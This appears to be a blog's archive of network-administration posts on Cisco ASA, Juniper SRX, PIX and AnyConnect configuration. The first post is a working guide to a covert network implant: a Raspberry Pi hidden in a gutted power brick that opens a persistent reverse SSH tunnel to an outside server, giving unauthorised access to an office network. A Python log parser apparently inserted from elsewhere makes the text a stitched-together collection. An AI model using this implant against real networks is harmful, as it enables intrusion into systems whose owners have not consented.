Archive for the ‘Scripts’ Category

When I received my Raspberry Pi I immediately wanted to use it as a hacking remote tech support tool. The idea was to be able to plug it in somewhere and have it be small enough that it's not noticed in someone's network. Then if I could access it remotely I am in their network and can do things.

 

Step 1. Connecting to the Pi

The problem is that if I plug this in somewhere in the world and leave it I need it to phone home so I can gain remote connectivity to it. I know my home’s IP but I don’t know the Pi’s IP. I want it to be a plug in and run away type of scenario and not one that I’ll be hooking up any monitor or keyboard or anything.

First put a linux distro on it. I’ll use cutie pi.

Next set it to receive a remote ssh connection. This is again standard admin stuff.

So now you’re at the point that you can ssh to it remotely if you know its IP. Well you don’t know its IP and even if you did it is probably behind a firewall which makes it impossible to get to. Or so you think.

What you'll need is a linux server that has a persistent IP. One that you can ssh into from anywhere in the world. Suppose its IP is 25.25.25.25.

From the Raspberry Pi you should be able to ssh to this host. So now you want to set it up so the authentication is key based rather than password based (this way the Pi can be set up to ssh into the server unattended). From the Pi do the following to create key based authentication.

  1. cd ~/.ssh
  2. ssh-keygen -t rsa
  3. Choose no passphrase when asked and accept the default filename of id_rsa
  4. scp id_rsa.pub <user>@<yourhost>:.ssh/authorized_keys (this replaces any authorized_keys file already on the server; if one exists, append the key to it instead)
  5. Provide your password when asked and that’s the last time you’ll have to do it!

Now comes the fun part. Create a reverse remote ssh tunnel to that host to forward connections back to the Pi. Confused? Here look at this command you would issue from the Pi:

ssh -N -R 2222:localhost:22 [email protected]

The Pi is ssh'ing to the server at 25.25.25.25 using the username "serverUser". Upon connecting, it tells that server to listen on port 2222 (on the server's loopback address only, which is the sshd default unless GatewayPorts is enabled). Any connection coming into the server on port 2222 is forwarded over the tunnel back to the Pi on port 22. The -N flag says we don't need to run any commands once connected; the session exists only to carry the forward.

Once the Pi sets up that remote tunnel, from the server it connected to you can do this:

ssh -l piUser -p 2222 localhost

Now you should be ssh’d into the Pi using port 2222 on the linux server! Awesome!

Next is to make this a persistent thing. You want the Pi to keep trying to build this ssh tunnel always and if it goes down try to bring it back. We’ll do this using a bash script and cron job.

Create a file on the Pi called ~/create_ssh_tunnel.sh and put this in it:

#!/bin/bash
# Rebuild the reverse tunnel to the jump host if it is not already running.
# The username and address are the ones described above (serverUser at 25.25.25.25).
JUMP_USER=serverUser
JUMP_HOST=25.25.25.25
TUNNEL_ARGS="-N -R 2222:localhost:22 ${JUMP_USER}@${JUMP_HOST}"

createTunnel() {
    # ServerAlive* make a dead connection exit instead of hanging forever, and
    # ExitOnForwardFailure makes ssh fail if port 2222 is still bound on the server,
    # so the next cron run can try again.
    /usr/bin/ssh -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -o ExitOnForwardFailure=yes ${TUNNEL_ARGS}
    rc=$?   # capture immediately; $? inside the if below would be the test's result
    if [[ $rc -eq 0 ]]; then
        echo "Tunnel to jumpbox created successfully"
    else
        echo "An error occurred creating a tunnel to jumpbox. RC was $rc"
    fi
}

# pidof ssh would match any ssh client; look for this tunnel's exact arguments instead.
if ! /usr/bin/pgrep -f -- "ssh.*${TUNNEL_ARGS}" > /dev/null; then
    echo "Creating new tunnel connection"
    createTunnel
fi

What this script does is check whether an ssh process for the tunnel is already running. If there isn't one, it starts the ssh tunnel.

Next make it executable by doing the following:

chmod 700 ~/create_ssh_tunnel.sh

Now start the crontab.

crontab -e

Place this in as your cron job (every minute check if the ssh connection is up, if not, attempt to bring it up)

*/1 * * * * ~/create_ssh_tunnel.sh > tunnel.log 2>&1

To troubleshoot any problems in this you can view the tunnel.log file.

Now let's take a step back and look at what we've done. When the Raspberry Pi is on, it will check every minute to see if an ssh connection to your linux server exists. If it doesn't it will create one. The tunnel it creates is really a reverse remote tunnel. Once the tunnel is up, anyone who ssh's into port 2222 of the linux server will then be redirected to the Pi. Incredible!

 

Step 2. Concealing the Pi

I found an old powerbrick for a laptop and gutted it.

The raspberry pi almost fit. I had to solder off the S-Video port to get it to fit just right.

Then I had to hook power up to it. In order to do this I simply took apart a USB charger. Took the plastic casing off to save space and cut the cord to save even more space.

Lastly was finding a black ethernet cable so both cables coming out of the power brick are black and look inconspicuous.

Here are pictures of it in its special case:

 

 

Step 3. Testing it

Check it out! I have this plugged into an office somewhere. It looks weird when you stare at it but put it behind a plant and nobody will ever notice it (except the guy who waters the plants).

 

Once I plugged it in I went back home. Right after the Pi got an IP address it created a tunnel to my home server. When I tried ssh'ing into port 2222 of my home server I was redirected to the Pi. Now I am on a computer in someone else's network. Woohoo!

 

 

Information regarding the Cisco ASA Botnet License.

What is it?

Botnet Traffic Filter is an extra license that can be applied to a Cisco ASA firewall that provides detection and automatic blocking of known bots and botnets. The firewall grabs updates from Cisco’s website to know which IPs to look for and block.

Besides stopping outside botnets from coming into the network the botnet filter is also very effective at identifying which hosts may have malicious software within the network. It will stop internal hosts from going out to a known botnet IP. It has the ability to listen for call-home or command/control behavior seen within the network.

 

License

It is time based. The SKU is something like L-ASA55xx-BOT-1YR=

It costs between $200-$500 per year. It will only fully work on version 8.2.2 and up.

Purchase license. Apply it using the activation-key command.

Requires the 3DES/AES license (this license is free but does not ship with an ASA).

 

Initial Configuration

The firewall needs to communicate to update-manifests.ironport.com. This means it has to have a valid DNS lookup mechanism. To get this going do something like the following:

dns domain-lookup INSIDE
dns server-group DefaultDNS
name-server 10.2.2.2

There are over 70,000 DNS names that are in the Cisco database and only 5000 IP addresses. To effectively look at each domain name, DNS snooping must be turned on. To do that issue the following commands:

class-map dynamic-filter_snoop_class
match port udp eq domain

policy-map global_policy
class dynamic-filter_snoop_class
inspect dns preset_dns_map dynamic-filter-snoop

 

Next turn on the dynamic-filters. I like to start by blocking everything that is blacklisted and whitelist the CEO’s IP from being blocked. Do this by issuing the following commands:

dynamic-filter updater-client enable
dynamic-filter use-database
dynamic-filter enable interface OUTSIDE
dynamic-filter drop blacklist interface OUTSIDE
dynamic-filter whitelist
address 10.1.4.4 255.255.255.255

 

Checking to see what’s happening

Verify the ASA is downloading the rules:

show dynamic-filter updater-client

Verify traffic is being inspected:

show dynamic-filter statistics

View which hosts are being blocked:

show dynamic-filter reports infected-host all

 

Using Splunk to see even more

If you are collecting the ASA's syslogs in Splunk you can create a dashboard that shows these statistics over time. Here is the code for a dashboard that could be used for that purpose (note this would require the Splunk for Cisco ASA plugin):

<?xml version='1.0' encoding='utf-8'?>
<form>
<label>Botnet Information by host</label>

<!-- define master search template; leave time unbounded so that the time input can be used -->

<fieldset>

<input type="text" token="host">
<label>Host</label>
</input>

<!-- add default TimePicker -->
<input type="time" />

</fieldset>

<row>
<chart>
<title>Botnet activity. Tracked by whether the source or destination is blacklisted</title>
<searchTemplate>$host$ error_code=338007 OR error_code=338006 OR error_code=338008 | rex field=_raw ", (?&lt;srcdst&gt;[\w]+) \d" | timechart span=1hr count by srcdst</searchTemplate>
<option name="charting.chart">line</option>
<option name="charting.legend.placement">right</option>
</chart>
</row>

<row>
<chart>
<title>External blacklisted IPs are targeting these systems</title>
<searchTemplate>$host$ error_code=338007 | rex field=_raw "from (?&lt;Source&gt;[^\']+) to (?&lt;Destination&gt;[^\']+), source.*threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)" | timechart span=30min count by Destination</searchTemplate>
<option name="charting.chart">line</option>
<option name="charting.legend.placement">right</option>
</chart>
</row>
<row>
<chart>
<title>Internal systems that are targeting external blacklisted IPs</title>
<searchTemplate>$host$ error_code=338008 OR error_code=338006 | rex field=_raw "from (?&lt;Source&gt;[^\']+) to.*resolved from dynamic list:(?&lt;Destination&gt;[^\']+), threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)" | timechart span=30m count by Source</searchTemplate>
<option name="charting.chart">line</option>
<option name="charting.legend.placement">right</option>
</chart>
</row>

<row>

<single>
<searchTemplate>$host$ error_code=444005 earliest_time=-1d | rex field=_raw "will expire in (?&lt;avg&gt;[^\']+) days" | chart min(avg)</searchTemplate>
<title>Botnet license expires in this many days (444005)</title>
</single>
<single>
<searchTemplate>$host$ error_code=338007 | chart count</searchTemplate>
<title>Total denied incoming connections due to botnet filter</title>
</single>
<single>
<searchTemplate>$host$ error_code=338006 OR error_code=338008 | chart count</searchTemplate>
<title>Total denied outgoing connections due to botnet filter</title>
</single>

</row>
<row>

<table>
<title>Top 10 denied traffic flows due to blacklisted source IP (338007)</title>
<searchTemplate>$host$ error_code=338007 | rex field=_raw "from (?&lt;Source&gt;[^\']+) to (?&lt;Destination&gt;[^\']+), source.*threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)" | stats count by Source Destination Threat_Level Category | sort 10 -count</searchTemplate>
</table>

<table>
<title>Top 10 denied traffic flows due to blacklisted destination IP (338006, 338008)</title>
<searchTemplate>$host$ error_code=338008 OR error_code=338006 | rex field=_raw "from (?&lt;Source&gt;[^\']+) to.*resolved from dynamic list:(?&lt;Destination&gt;[^\']+), threat-level: (?&lt;Threat_Level&gt;[^\']+), category: (?&lt;Category&gt;[^\']+)" | stats count by Source Destination Threat_Level Category | sort 10 -count</searchTemplate>
</table>

</row>

<row>

<table>
<title>Top 10 addresses for message: URL Timed Out, Removing Rule (338303)</title>
<searchTemplate>$host$ error_code=338303 | rex field=_raw "Address (?&lt;avg&gt;[^\']+) timed out" | stats count by avg | sort 10 -count</searchTemplate>
</table>

</row>

</form>
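The same field extractions the dashboard's rex commands perform, written as a stand-alone Python parser so you can run them over exported ASA syslog lines without Splunk. This is an added example, not code from the post or from Cisco; the regexes are the dashboard's in Python's (?P<name>) group syntax, and the sample log lines are constructed to match those patterns rather than copied from a real ASA.

```python
import re
from collections import Counter

# Message ids as the dashboard groups them: 338007 = dropped because the
# source is blacklisted (inbound), 338006/338008 = blacklisted destination (outbound).
INBOUND_CODES = {"338007"}
OUTBOUND_CODES = {"338006", "338008"}

CODE_RE = re.compile(r"%ASA-\d-(?P<code>\d{6}):")
# The three rex extractions from the dashboard, in Python's (?P<name>) syntax.
DIRECTION_RE = re.compile(r", (?P<srcdst>[\w]+) \d")
INBOUND_RE = re.compile(
    r"from (?P<Source>[^']+) to (?P<Destination>[^']+), source.*"
    r"threat-level: (?P<Threat_Level>[^']+), category: (?P<Category>[^']+)"
)
OUTBOUND_RE = re.compile(
    r"from (?P<Source>[^']+) to.*resolved from dynamic list:(?P<Destination>[^']+), "
    r"threat-level: (?P<Threat_Level>[^']+), category: (?P<Category>[^']+)"
)


def parse_event(line):
    """Return the dashboard's fields for one botnet-filter syslog line, else None."""
    code_match = CODE_RE.search(line)
    if not code_match:
        return None
    code = code_match.group("code")
    if code in INBOUND_CODES:
        fields = INBOUND_RE.search(line)
    elif code in OUTBOUND_CODES:
        fields = OUTBOUND_RE.search(line)
    else:
        return None  # not a botnet-filter drop message
    if not fields:
        return None  # botnet message, but not in the shape the rex expects
    # The dashboard's "dynamic list:" pattern has no space, so strip captured values.
    event = {name: value.strip() for name, value in fields.groupdict().items()}
    event["code"] = code
    direction = DIRECTION_RE.search(line)
    event["srcdst"] = direction.group("srcdst") if direction else "unknown"
    return event


def host_only(endpoint):
    """'inside:10.1.4.20/52110 (10.1.4.20/52110)' -> '10.1.4.20'."""
    return endpoint.split(":", 1)[-1].split("/", 1)[0]


def summarize(lines):
    """Aggregate parsed events the way the dashboard panels do."""
    events = [e for e in map(parse_event, lines) if e]
    inbound = [e for e in events if e["code"] in INBOUND_CODES]
    outbound = [e for e in events if e["code"] in OUTBOUND_CODES]
    return {
        "by_srcdst": Counter(e["srcdst"] for e in events),
        "inbound_by_destination": Counter(e["Destination"] for e in inbound),
        "outbound_by_source": Counter(e["Source"] for e in outbound),
        # internal hosts talking to blacklisted destinations are the likely infected ones
        "infected_hosts": Counter(host_only(e["Source"]) for e in outbound),
        "top_flows": Counter(
            (e["Source"], e["Destination"], e["Threat_Level"], e["Category"]) for e in events
        ).most_common(10),
    }


# Constructed sample lines (not real ASA output), shaped to match the rex patterns above.
SAMPLE_LOGS = [
    "%ASA-4-338007: Dynamic Filter dropped blacklisted TCP traffic from outside:203.0.113.7/443 "
    "(203.0.113.7/443) to inside:10.1.4.20/52110 (10.1.4.20/52110), source 203.0.113.7 resolved "
    "from dynamic list: bad.example, threat-level: very-high, category: Malware",
    "%ASA-4-338008: Dynamic Filter dropped blacklisted UDP traffic from inside:10.1.4.20/51000 "
    "(10.1.4.20/51000) to outside:198.51.100.9/53 (198.51.100.9/53), destination 198.51.100.9 "
    "resolved from dynamic list: c2.example, threat-level: high, category: Botnet",
    "%ASA-4-338006: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.4.31/49211 "
    "(10.1.4.31/49211) to outside:198.51.100.9/80 (198.51.100.9/80), destination 198.51.100.9 "
    "resolved from dynamic list: c2.example, threat-level: high, category: Botnet",
    # an ordinary connection message, which the parser must ignore
    "%ASA-6-302013: Built inbound TCP connection 1234 for outside:203.0.113.9/40000 "
    "(203.0.113.9/40000) to inside:10.1.4.20/22 (10.1.4.20/22)",
]

if __name__ == "__main__":
    for panel, result in summarize(SAMPLE_LOGS).items():
        print(panel, dict(result) if isinstance(result, Counter) else result)
```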

 

 

 

More information on Cisco’s website:

http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/guide/conns_botnet.html#wp1129967

 

 

To copy a file from an FTP server to the flash of an ASA you could do the following:

copy ftp flash

Which will then prompt you for all the details (username/password/location/file). But there is a better way which will allow you to put all of that information on one line.

To indicate all of the details on one line you can do:

copy ftp://ftpuser:[email protected]/asa/asa825-41-k8.bin flash

This indicates that the username is ftpuser, the password is PassworD, the FTP server is at 192.168.5.50 and the file is /asa/asa825-41-k8.bin on that server. Note that the password appears in clear text on the command line, and FTP also sends it in clear text over the network.

Today we are going to set up a Cisco ASA firewall to send WCCP (port 80) web inspection traffic to a Cisco Ironport WSA (Web Security Appliance).

Suppose the following:

Ironport WSA IP address: 192.168.5.55

Inside IP of ASA firewall: 192.168.5.1

Inside IP address range: 192.168.0.0/16

 

Cisco ASA firewall configuration:

! Define the Ironport IP Address in an ACL
access-list ACL-IRONPORT-WSA extended permit ip host 192.168.5.55 any

! Define what traffic should be inspected
access-list ACL-WEBPROXY-TRAFFIC extended permit tcp 192.168.0.0 255.255.0.0 any eq www

! Apply the WCCP configuration
wccp web-cache redirect-list ACL-WEBPROXY-TRAFFIC group-list ACL-IRONPORT-WSA
wccp interface INSIDE web-cache redirect in

 

Now configure the Ironport.

Navigate to Network -> Transparent Redirection

Make the type WCCP v2 Router

Add a service with a name of WEB_CACHE, a router IP of 192.168.5.1 (ASA Inside IP) and port 80 (Standard).

 

At this point you can do a ‘show wccp’ on the ASA and you should see “Total Packets Redirected” rising. From within the Ironport go to Reporting -> Overview and you should see statistics of what traffic is now flowing through the Ironport.

 

Troubleshooting techniques:

  • Verify basic connectivity. Check interface IP addresses. Verify network access between both ASA and Ironport.
  • Show commands on ASA: show wccp
  • Debug commands on firewall: debug wccp packet, debug wccp events
  • Verify the ports caught in the traffic ACL are the same as the ports used for WCCP and there’s a listener (service) on Ironport to interpret them.

Vulnerability scanners are reporting that ssh version 1 is on by default for Cisco IPS units. It is fairly simple to turn this off on the IPS if you have service level privilege.

First get into the service level account. This is essentially the linux shell under the IPS. Once you are ssh’d in, issue these commands.

su

vi /etc/ssh/sshd_config

Change the line that says:

#Protocol 2,1

Uncomment it and take out the ',1' so it looks like this:

Protocol 2

Save the file and exit out of vi.

Restart the ssh daemon. (Warning: This may cause a failover if these are IPSMs in a failover pair).

/etc/init.d/S60ssh restart

Now you can test ssh’ing into your device and you should see this error:

[user@linuxbox1 ~]$ ssh 10.50.50.10 -1
Protocol major versions differ: 1 vs. 2

Voila, ssh version 1 is now disabled!

 

 

Blue firewall: Juniper SRX 210 (JunOS 10.0R1.8)

Red firewall: Cisco ASA 5510 (OS 8.4)

This is a script to create a site to site VPN tunnel between a Cisco ASA and a Juniper SRX. The Juniper SRX will be using a policy based VPN.

 

 

Blue Juniper SRX

# Create the IKE proposal
set security ike proposal IKE-SHA-AES128-DH1 authentication-method pre-shared-keys
set security ike proposal IKE-SHA-AES128-DH1 dh-group group2
set security ike proposal IKE-SHA-AES128-DH1 encryption-algorithm aes-128-cbc
set security ike proposal IKE-SHA-AES128-DH1 authentication-algorithm sha1
set security ike proposal IKE-SHA-AES128-DH1 lifetime-seconds 86400

# Create the IKE policy
set security ike policy IKE-POLICY-HQ mode main
set security ike policy IKE-POLICY-HQ proposals IKE-SHA-AES128-DH1
set security ike policy IKE-POLICY-HQ pre-shared-key ascii-text s3kreTKey

# Create an IKE gateway
set security ike gateway IKE-GATEWAY-HQ ike-policy IKE-POLICY-HQ
set security ike gateway IKE-GATEWAY-HQ address 22.22.22.22
set security ike gateway IKE-GATEWAY-HQ external-interface ge-0/0/0.0

# Create an IPSec proposal/transform set
set security ipsec proposal IPSEC-SHA-AES128-ESP encryption-algorithm aes-128-cbc
set security ipsec proposal IPSEC-SHA-AES128-ESP authentication-algorithm hmac-sha1-96
set security ipsec proposal IPSEC-SHA-AES128-ESP protocol esp
set security ipsec proposal IPSEC-SHA-AES128-ESP lifetime-seconds 3600

# Create an IPSec policy
set security ipsec policy VPN-POLICY-HQ proposals IPSEC-SHA-AES128-ESP

# Create the IPSec VPN
set security ipsec vpn VPN-HQ ike gateway IKE-GATEWAY-HQ
set security ipsec vpn VPN-HQ ike ipsec-policy VPN-POLICY-HQ

# Add some networks into the address book
set security zones security-zone OUTSIDE address-book address NET-REMOTE-VPN 172.16.22.0/24
set security zones security-zone INSIDE address-book address NET-LOCAL 192.168.11.0/24

# Create the policies to define the interesting traffic
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match source-address NET-LOCAL
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match destination-address NET-REMOTE-VPN
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT match application any
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT then permit tunnel ipsec-vpn VPN-HQ
set security policies from-zone INSIDE to-zone OUTSIDE policy VPN-POLICY-HQ-OUT then permit tunnel pair-policy VPN-POLICY-HQ-IN

set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match source-address NET-REMOTE-VPN
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match destination-address NET-LOCAL
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN match application any
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN then permit tunnel ipsec-vpn VPN-HQ
set security policies from-zone OUTSIDE to-zone INSIDE policy VPN-POLICY-HQ-IN then permit tunnel pair-policy VPN-POLICY-HQ-OUT

# You want to exclude the VPN traffic from being NAT’d
set security nat source rule-set NAT-INTERFACE rule NO-NAT match source-address 192.168.11.0/24
set security nat source rule-set NAT-INTERFACE rule NO-NAT match destination-address 172.16.22.0/24
set security nat source rule-set NAT-INTERFACE rule NO-NAT then source-nat off

# My config already had a rule in the rule-set. So I had to move the new rule above the old rule so it processes the no-NAT rule first.
insert security nat source rule-set NAT-INTERFACE rule NO-NAT before rule RULE-NAME

Red Cisco ASA Firewall

! Define the interesting traffic
access-list ACL-VPN-SRX extended permit ip 172.16.22.0 255.255.255.0 192.168.11.0 255.255.255.0

! Set the IKE parameters
crypto ikev1 enable OUTSIDE
crypto ikev1 policy 5
authentication pre-share
encryption aes
hash sha
group 2
lifetime 86400

! Create the IPSec settings
crypto ipsec ikev1 transform-set ESP-AES128-SHA esp-aes esp-sha-hmac
crypto map MAP-VPN 10 match address ACL-VPN-SRX
crypto map MAP-VPN 10 set peer 11.11.11.11
crypto map MAP-VPN 10 set ikev1 transform-set ESP-AES128-SHA
crypto map MAP-VPN interface OUTSIDE

! Create the tunnel group
tunnel-group 11.11.11.11 type ipsec-l2l
tunnel-group 11.11.11.11 ipsec-attributes
ikev1 pre-shared-key s3kreTKey

! In my case I needed to tell this VPN traffic to not be NAT’d as it goes through the firewall
object network OBJ-172.16.22.0
subnet 172.16.22.0 255.255.255.0
object network OBJ-192.168.11.0
subnet 192.168.11.0 255.255.255.0
nat (INSIDE,OUTSIDE) source static OBJ-172.16.22.0 OBJ-172.16.22.0 destination static OBJ-192.168.11.0 OBJ-192.168.11.0 no-proxy-arp description No NAT for VPN to SRX

There is a great tool to generate the Juniper SRX code on Juniper’s site:

https://www.juniper.net/customers/support/configtools/vpnconfig.html

 

To build the Juniper config I used this page as a reference guide:

http://www.juniper.net/techpubs/en_US/junos/topics/example/policy-based-vpn-using-j-series-srx-series-device-configuring.html

 

 

 

This tutorial shows you how to install an HTTPS/SSL certificate on an ASA. This is often needed when WebVPN or AnyConnect is configured, since both use SSL. Without a certificate installed, users are given warnings and errors about a missing or invalid certificate.

This has nothing to do with authentication. It’s simply the https certificate which is needed for a secure communication to be set up.

Suppose you are working for a place called http://company.com and they want to set up their ASA to allow users to VPN into the network. To access the VPN you can either use IPSec or SSL. Suppose their choice was SSL and they want the URL of the ASA to be https://vpn.company.com. This tutorial will help set the HTTPS certificate for that URL.

It is easier for me to use ASDM when dealing with certificates so this tutorial uses ASDM exclusively.

Step 1 – Create an Identity Certificate

Under Configuration -> Device Management -> Certificate Management -> Identity Certificates

Click Add.

Give the Trustpoint a Name.

Choose “Add” a new identity certificate

Choose the key pair to use for encryption.

Click “Select” for the certificate subject DN. In this section it is important to make the CN = the URL of the ASA that this certificate will be serving. It doesn’t need to have any trailing slashes. So if the URL is “https://example.com/owa” you can simply make the CN “example.com”.

Click “advanced”.

Fill in the FQDN field. This should be exactly the same as CN.

Click Add certificate.

Step 2 – Send the certificate to the CA

After completing step 1 you will be presented with the option of saving your certificate.

Send this certificate request to a CA such as Symantec or Verisign. They will then process it and send you back your public certificate.

Step 3 – Installing your certificate

Go back to the ASDM: Configuration -> Device Management -> Certificate Management -> Identity Certificates

Click the certificate you made earlier. Then click Install.

Paste in the certificate the CA sent you. Paste in everything including the BEGIN CERTIFICATE and END CERTIFICATE lines, but make sure there are no trailing spaces or carriage returns. You do not need any of the intermediate certificates here, simply the public cert.

Step 4 – Enabling your certificate on an interface

Go to Configuration -> Remote Access VPN -> Network (client) access -> AnyConnect Connection Profiles

Click Device Certificate

Choose the certificate you installed as the one to use for when users HTTPS to this device.

 

That’s it! Test the functionality by going to the URL of your ASA by using HTTPS.

 

 

 

 

This post will try to help you understand the differences between the AnyConnect Premium and AnyConnect Essentials licenses.

Note: You cannot have both Essentials and Premium running at once.

Note: Cisco ASA 8.3+ no longer requires both the Active and Standby unit to each have a license. The active license is shared between the failover units. This should not be confused with the ‘shared premium license’.

Note: Cisco Secure Desktop is now deprecated. Cisco has stopped development for it.

Source of this image: Cisco’s Partner Education center – ASA Licensing Webex.

To enable AnyConnect essentials:

Purchase the license (L-ASA-AC-E-55xx= it costs $100-$500).

Apply the license to the ASA using the ‘activation-key’ command. This does not require a reboot.

Apply the config:

webvpn
 anyconnect-essentials

Now your firewall will be licensed for up to as many connections as the "Total VPN Peers" line shows. For instance if your show version says this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Enabled        perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual

You will now be licensed to accommodate 250 anyconnect connections.

 

To enable AnyConnect Premium

Buy the license. You must purchase a license for a specific number of users (L-ASA-SSL-10= costs around $800).

Apply the license to the ASA using the ‘activation-key’ command. This does not require a reboot.

Configure the ASA:

webvpn
  no anyconnect-essentials

If you’ve already licensed this ASA for Essentials in the past then it will still show as an enabled license.

Once this is complete your ASA will be licensed to accept as many AnyConnect connections as you have Premium licenses for. So if your 'show version' looks like this:

AnyConnect Premium Peers          : 10             perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual

Then your ASA can have 10 Anyconnect users at once.

Note: The name “Anyconnect Premium” has changed a lot in different versions. Here are the different naming schemes.
7.1(1) known as “ssl vpn”
8.2(1) name changed to “anyconnect premium ssl vpn edition”
8.3(1) name changed to “anyconnect premium ssl vpn”
8.4(1) name changed to “anyconnect premium”

 

AnyConnect for Mobile

This license allows AnyConnect connections from mobile devices. There is current support for iPhone, iPad, Android Ice Cream Sandwich, rooted Androids and Samsung Galaxy devices.

The mobile license is on or off and not tied to a number of users. It costs between $100-$500.

This license is applied by simply using the ‘activation-key’ command. A reboot is not needed. There is no further configuration needed after that.

 

Advanced Endpoint Assessment

Advanced Endpoint Assessment includes all of the Endpoint Assessment features, and lets you configure an attempt to update noncompliant computers to meet version requirements.

This license is applied by simply using the ‘activation-key’ command. A reboot is not needed.

 

Shared Premium License

New to ASA 8.3+ code is the ability to share licensing. This is only for Anyconnect Premium. It allows for one ASA to have a shared license which other ASAs can use.

This configuration requires two extra licenses: a shared server license on the ASA acting as the license server, which sets how many shared peers are in the pool, and a shared participant license on each ASA that draws from that pool.

After buying a shared participant license and applying it with the ‘activation-key’ command, configure it with a command similar to this:

license-server address 10.15.0.15 secret SeKreTkey

The ‘show version’ on the participant ASA will show this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 5000           perpetual
Total VPN Peers                   : 5000           perpetual
Shared License                    : Enabled        perpetual

 

Now buy the shared premium license for the server for the amount of users you wish to have.

Apply the license using the ‘activation-key’ command. Then apply the following config:

license-server secret SeKreTkey
license-server enable inside

The ‘show version’ at this point looks like this:

AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 5000           perpetual
Total VPN Peers                   : 5000           perpetual
Shared License                    : Enabled        perpetual

Also you can see the 'show shared license' output:

Shared license utilization:
  AnyConnect Premium:
    Total for network :     5000
    Available         :     4900
    Utilized          :      100
  This device:
    Platform limit    :     5000
    Current usage     :       50
    High usage        :      100
  Messages Tx/Rx/Error:
    Registration    : 441798 / 441789 / 9
    Get             : 28 / 28 / 0
    Release         : 27 / 27 / 0
    Transfer        : 0 / 0 / 0

  Client ID           Usage   Hostname
  JMX1111             50      vpn-asa-01

The Cisco PIX 506E is only supposed to run code up to 6.3.5. It is however possible to go higher. In order to do this you need to have your PIX 506E have 64MB of RAM. In order for me to do this I had to double up my current RAM. The PIX 506E had only 28MB of RAM however the 506E has two memory slots and can easily upgrade to 64MB if you have another stick (or PIX you aren’t using).

Version 7.1.2 is chosen as the best code because it fits on the system, which has 8MB of flash. This means there will be no room left for an ASDM. At some point in the 7.x versions, Cisco put a check in the firmware to prevent 8.0 code from running if the model is a PIX 506E. This can actually be overcome by rewriting the .bin file (using lzma) to change each CRC check to PIX506E instead of PIX515E. There are a total of 6 CRC checks that need to be switched to do this. This post does not cover how to upgrade above 7.1.2.

Once I had the memory installed this was my console output during my upgrade procedure.

SETUP: TFTP Server:192.168.5.1
PIX: 192.168.5.2
Consoled into PIX.

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Reading 1974784 bytes of image from flash.
#################################################################################################################
64MB RAM
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
System Flash=E28F640J3 @ 0xfff00000
BIOS Flash=am29f400b @ 0xd8000

-----------------------------------------------------------------------
|| ||
|| ||
|||| ||||
..:||||||:..:||||||:..
c i s c o S y s t e m s
Private Internet eXchange
-----------------------------------------------------------------------
Cisco PIX Firewall

Cisco PIX Firewall Version 6.3(5)
Licensed Features:
Failover: Disabled
VPN-DES: Enabled
VPN-3DES-AES: Enabled
Maximum Physical Interfaces: 2
Maximum Interfaces: 4
Cut-through Proxy: Enabled
Guards: Enabled
URL-filtering: Enabled
Inside Hosts: Unlimited
Throughput: Unlimited
IKE peers: Unlimited

This PIX has a Restricted (R) license.

Cryptochecksum(unchanged): 6a5b0c6c fd46250c 3dd9bb06 a6df7e62
Type help or ‘?’ for a list of available commands.
pixfirewall> en
Password:
pixfirewall(config)# no dhcpd address 192.168.1.2-192.168.1.254 inside
DHCPD disabled on inside interface because address pool is removed
pixfirewall(config)# no dhcpd enable inside
pixfirewall(config)# ip address inside 192.168.5.2 255.255.255.0
pixfirewall(config)# ping 192.168.5.1
192.168.5.1 response received -- 0ms
192.168.5.1 response received -- 0ms
192.168.5.1 response received -- 0ms
pixfirewall(config)# exit
pixfirewall# wr mem
Building configuration…
Cryptochecksum: 5ca481c6 1487c90e c50ead2b a3088231
[OK]
pixfirewall# clear flashfs
pixfirewall# sh flash
flash file system: version:0 magic:0x0
file 0: origin: 0 length:0
file 1: origin: 0 length:0
file 2: origin: 0 length:0
file 3: origin: 0 length:0
file 4: origin: 0 length:0
file 5: origin: 0 length:0
pixfirewall# reboot
Proceed with reload? [confirm]

Rebooting..

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
